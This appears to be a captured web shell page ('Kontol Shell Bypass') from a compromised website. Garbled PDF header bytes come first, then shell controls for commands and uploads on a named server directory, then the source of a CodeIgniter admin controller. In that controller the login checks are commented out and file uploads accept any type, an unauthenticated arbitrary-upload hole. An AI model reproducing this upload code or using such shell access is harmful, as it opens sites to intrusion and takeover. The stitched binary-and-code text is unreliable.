%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/agusttya.com/blog/application/controllers/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/agusttya.com/blog/application/controllers/admin/Custommodule.php
<?php
/*
* @Author:    Sharda Tech Pvt. Ltd.
*/
if (!defined('BASEPATH')) {
    exit('No direct script access allowed');
}

class Custommodule extends CI_Controller
{

    public function __construct()
    {
        parent::__construct();
        $this->load->model('Common_Model');
    }

    /*
	* Function: index
	*/
    public function index($page = 0)
    {
		//$this->login_check();
        $data = array();
        $head = array();
		
	}

    public function custommodule()
    {
        //$this->login_check();
		
		if (isset($_GET['delete'])) {
            $this->Common_Model->deleteRecord($_GET['delete'],'id','su_customfiles');
            $this->session->set_flashdata('result_delete', 'File is deleted!');
            redirect('admin/custommodule/custommodule');
        }
		
        $data = array();
        $head = array();
        $head['title'] = 'Administration - Manage Files';
        $head['description'] = '!';
        $head['keywords'] = '';
		
		// Validate the form
		$this->form_validation->set_rules('title', 'Title', 'trim|required');
		$this->form_validation->set_rules('status', 'Status', 'trim|required');
       
		if ($this->form_validation->run($this)) {
			$_POST['file_names'] = $this->uploadImage();
			if($_POST['old_image']!='' && $_POST['file_names']==''){ $_POST['file_names'] = $_POST['old_image']; } unset($_POST['old_image']);
		    $this->Common_Model->setRecords($_POST, 'su_customfiles');
            //$this->saveHistory('upload new file  - ' . $_POST['title']);
            redirect('admin/custommodule/custommodule');
        }
		
		if(isset($_GET['edit'])) {
            $_POST = $this->Common_Model->getCustomFiles($_GET['edit']);
        }
		
        // Get All SU Banners
		$data['customFiles'] = $this->Common_Model->getCustomFiles();
		
        $this->load->view('admin/_parts/header', $head);
        $this->load->view('admin/custommodule/custommodule', $data);
        $this->load->view('admin/_parts/footer');
        //$this->saveHistory('Go to Admin Users');
    }
	
	/*
	* Function : uploadImage
	* Description : Upload the banner image 
	*/
	private function uploadImage()
    {
	
        $config['upload_path'] = './attachments/custom_files/';
        $config['allowed_types'] = '*';
		
        $this->load->library('upload', $config);
        $this->upload->initialize($config);
        if (!$this->upload->do_upload('file_names')) {
            log_message('error', 'Image Upload Error: ' . $this->upload->display_errors());
        }
        $img = $this->upload->data();
        return $img['file_name'];
    }
	
}

Kontol Shell Bypass